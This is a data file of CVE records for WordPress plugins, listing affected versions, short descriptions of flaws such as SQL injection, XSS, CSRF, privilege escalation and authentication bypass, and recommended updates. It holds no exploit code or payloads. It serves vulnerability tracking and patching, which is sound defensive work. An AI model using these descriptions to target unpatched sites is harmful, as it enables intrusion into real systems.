{"CVE_ID":"CVE-2024-10729","slug":"woocommerce-booking","versionImpact":"6.9.0","versionEndExcluding":"6.10.0","description":"The Booking & Appointment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_google_calendar_data' function in versions up to, and including, 6.9.0. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily.","recommendation":"Update to version 6.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.tychesoftwares.com\\\/docs\\\/docs\\\/booking-appointment-plugin-for-woocommerce-new\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.tychesoftwares.com\\\/docs\\\/docs\\\/booking-appointment-plugin-for-woocommerce-new\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ed215da-10c5-469b-bab2-923808feebd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ed215da-10c5-469b-bab2-923808feebd4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0789","slug":"wp-maintenance","versionImpact":"6.1.9.2","versionEndExcluding":"6.1.9.3","description":"The WP Maintenance plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 6.1.9.2 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to bypass maintenance mode.","recommendation":"Update to version 6.1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0904","slug":"fancy-product-designer","versionEndExcluding":"6.1.81","description":"The Fancy Product Designer WordPress plugin before 6.1.81 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.1.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf4afc9-c20e-47d6-a798-75e15652d1e3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf4afc9-c20e-47d6-a798-75e15652d1e3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0596","slug":"awesome-support","versionImpact":"6.1.7","versionEndExcluding":"6.1.8","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the editor_html() function in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to view password protected and draft posts.","recommendation":"Update to version 6.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0595","slug":"awesome-support","versionImpact":"6.1.7","versionEndExcluding":"6.1.8","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpas_get_users() function hooked via AJAX in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve user data such as emails.","recommendation":"Update to version 6.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0594","slug":"awesome-support","versionImpact":"6.1.7","versionEndExcluding":"6.1.8","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to union-based SQL Injection via the 'q' parameter of the wpas_get_users action in all versions up to, and including, 6.1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L1279\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L1279\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48323","slug":"awesome-support","versionEndExcluding":"6.1.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in Awesome Support Team Awesome Support \u2013 WordPress HelpDesk & Support Plugin allows Cross Site Request Forgery.This issue affects Awesome Support \u2013 WordPress HelpDesk & Support Plugin: from n\/a through 6.1.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/awesome-support\\\/wordpress-awesome-support-wordpress-helpdesk-support-plugin-plugin-6-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/awesome-support\\\/wordpress-awesome-support-wordpress-helpdesk-support-plugin-plugin-6-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5355","slug":"awesome-support","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Awesome Support WordPress plugin before 6.1.5 does not sanitize file paths when deleting temporary attachment files, allowing a ticket submitter to delete arbitrary files on the server.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6f7faca-dacf-4455-a837-0404803d0f25\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6f7faca-dacf-4455-a837-0404803d0f25\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5354","slug":"awesome-support","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Awesome Support WordPress plugin before 6.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa380524-031d-4e49-9d0b-96e62d54557f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa380524-031d-4e49-9d0b-96e62d54557f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5352","slug":"awesome-support","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Awesome Support WordPress plugin before 6.1.5 does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d32b2136-d923-4f36-bd76-af4578deb23b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d32b2136-d923-4f36-bd76-af4578deb23b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0365","slug":"fancy-product-designer","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Fancy Product Designer WordPress plugin before 6.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b8b9638-d52a-40bc-b298-ae1c74788c18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b8b9638-d52a-40bc-b298-ae1c74788c18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12156","slug":"seo-help","versionImpact":"6.1.3","versionEndExcluding":"6.1.4","description":"The AI Content Writer, RSS Feed to Post, Autoblogging SEO Help plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 6.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-help\\\/trunk\\\/inc\\\/scan-list-scan-table-header-results.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-help\\\/trunk\\\/inc\\\/scan-list-scan-table-header-results.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204821%40seo-help&new=3204821%40seo-help&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204821%40seo-help&new=3204821%40seo-help&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5111215-7ce9-46e3-b247-c3f0f28ec094?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5111215-7ce9-46e3-b247-c3f0f28ec094?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3104","slug":"wp-staging-pro","versionImpact":"6.1.2","versionEndExcluding":"6.1.3","description":"The WP STAGING Pro WordPress Backup Plugin for WordPress is vulnerable to Information Exposure in all versions up to and including 6.1.2 due to missing capability checks on the getOutdatedPluginsRequest() function. This makes it possible for unauthenticated attackers to reveal outdated installed active or inactive plugins.","recommendation":"Update to version 6.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wp-staging.com\\\/wp-staging-pro-changelog\\\/\",\"name\":\"https:\\\/\\\/wp-staging.com\\\/wp-staging-pro-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/572e290e-9324-4c17-8c3b-fa67233b15c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/572e290e-9324-4c17-8c3b-fa67233b15c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6244","slug":"essential-addons-for-elementor-lite","versionImpact":"6.1.19","versionEndExcluding":"6.1.20","description":"The Essential Addons for Elementor \u2013 Popular Elementor Templates and Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the via `Calendar` And `Business Reviews` Widgets attributes in all versions up to, and including, 6.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318211\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318211\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847a4fc7-3580-421e-8045-41b5a85f2d97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847a4fc7-3580-421e-8045-41b5a85f2d97?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10146","slug":"simple-file-list","versionImpact":"6.1.12","versionEndExcluding":"6.1.13","description":"The Simple File List WordPress plugin before 6.1.13 does not sanitise and escape a generated URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against admins.","recommendation":"Update to version 6.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9994","slug":"essential-addons-for-elementor-lite","versionImpact":"6.1.12","versionEndExcluding":"6.1.13","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the eael_pricing_item_tooltip_content parameter of the Pricing Table Widget in all versions up to, and including, 6.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Pricing_Table.php#L2164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Pricing_Table.php#L2164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855ae993-d887-4416-9b3c-8274a90dce5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855ae993-d887-4416-9b3c-8274a90dce5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9993","slug":"essential-addons-for-elementor-lite","versionImpact":"6.1.12","versionEndExcluding":"6.1.13","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the eael_event_details_text parameter of Event Calendar Widget in all versions up to, and including, 6.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Event_Calendar.php#L3079\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Event_Calendar.php#L3079\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8de8a0b-0b70-4e8a-8cc4-06cc50d06a02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8de8a0b-0b70-4e8a-8cc4-06cc50d06a02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12504","slug":"videowhisper-live-streaming-integration","versionImpact":"6.1.9","versionEndExcluding":"6.1.10","description":"The Broadcast Live Video \u2013 Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_hls' shortcode in all versions up to, and including, 6.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218331%40videowhisper-live-streaming-integration&new=3218331%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218331%40videowhisper-live-streaming-integration&new=3218331%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74b27798-3c6f-4c4e-80f8-7aa40f704fb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74b27798-3c6f-4c4e-80f8-7aa40f704fb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2376","slug":"wpqa","versionImpact":"6.1.0","versionEndExcluding":"6.1.1","description":"The WPQA Builder WordPress plugin before 6.1.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdd2e323-d589-4050-bc27-5edd2507a818\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdd2e323-d589-4050-bc27-5edd2507a818\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-2375","slug":"wpqa","versionImpact":"6.1.0","versionEndExcluding":"6.1.1","description":"The WPQA Builder WordPress plugin before 6.1.1 does not sanitise and escape some of its Slider settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d144e1c-a1f4-4c5a-93e2-4296a96d4ba2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d144e1c-a1f4-4c5a-93e2-4296a96d4ba2\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-8350","slug":"uncanny-learndash-groups","versionImpact":"6.1.0.1","versionEndExcluding":"6.1.1","description":"The Uncanny Groups for LearnDash plugin for WordPress is vulnerable to user group add due to a missing capability check on the \/wp-json\/ulgm_management\/v1\/add_user\/ REST API endpoint in all versions up to, and including, 6.1.0.1. This makes it possible for authenticated attackers, with group leader-level access and above, to add users to their group which ultimately allows them to leverage CVE-2024-8349 and gain admin access to the site.","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a38a58de-5f7d-4033-9a65-41b590b7d510?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a38a58de-5f7d-4033-9a65-41b590b7d510?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8349","slug":"uncanny-learndash-groups","versionImpact":"6.1.0.1","versionEndExcluding":"6.1.1","description":"The Uncanny Groups for LearnDash plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0.1. This is due to the plugin not properly restricting what users a group leader can edit. This makes it possible for authenticated attackers, with group leader-level access and above, to change admin account email addresses which can subsequently lead to admin account access.","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64cf0ae2-8d66-40d1-8bb6-0cab1dafab0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64cf0ae2-8d66-40d1-8bb6-0cab1dafab0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5946","slug":"digirisk","versionImpact":"6.0.0.0","versionEndExcluding":"6.1.0.0","description":"The Digirisk plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'current_group_id' parameter in version 6.0.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41355ed-77d0-48b3-bbb3-4cc3b4df4b2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41355ed-77d0-48b3-bbb3-4cc3b4df4b2a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1428184\\\/digirisk\\\/trunk\\\/modules\\\/society\\\/controller\\\/group.controller.01.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1428184\\\/digirisk\\\/trunk\\\/modules\\\/society\\\/controller\\\/group.controller.01.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4947","slug":"woocommerce-ean-payment-gateway","versionEndExcluding":"6.1.0","description":"The WooCommerce EAN Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the refresh_order_ean_data AJAX action in versions up to 6.1.0. This makes it possible for authenticated attackers with contributor-level access and above, to update EAN numbers for orders.","recommendation":"Update to version 6.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2760b183-3c15-4f0e-b72f-7c0333f9d4b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2760b183-3c15-4f0e-b72f-7c0333f9d4b6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-ean-payment-gateway\\\/\",\"name\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-ean-payment-gateway\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35910","slug":"quasar-form","versionEndExcluding":"6.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nucleus_genius Quasar form free \u2013 Contact Form Builder for WordPress allows SQL Injection.This issue affects Quasar form free \u2013 Contact Form Builder for WordPress: from n\/a through 6.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quasar-form\\\/wordpress-quasar-form-plugin-6-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quasar-form\\\/wordpress-quasar-form-plugin-6-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0816","slug":"formidable","versionEndExcluding":"6.1","description":"The Formidable Forms WordPress plugin before 6.1 uses several potentially untrusted headers to determine the IP address of the client, leading to IP Address spoofing and bypass of anti-spam protections.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a281f63f-e295-4666-8a08-01b23cd5a744\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a281f63f-e295-4666-8a08-01b23cd5a744\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5947","slug":"sf-booking","versionImpact":"6.0","versionEndExcluding":"6.1","description":"The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.","recommendation":"Update to version 6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
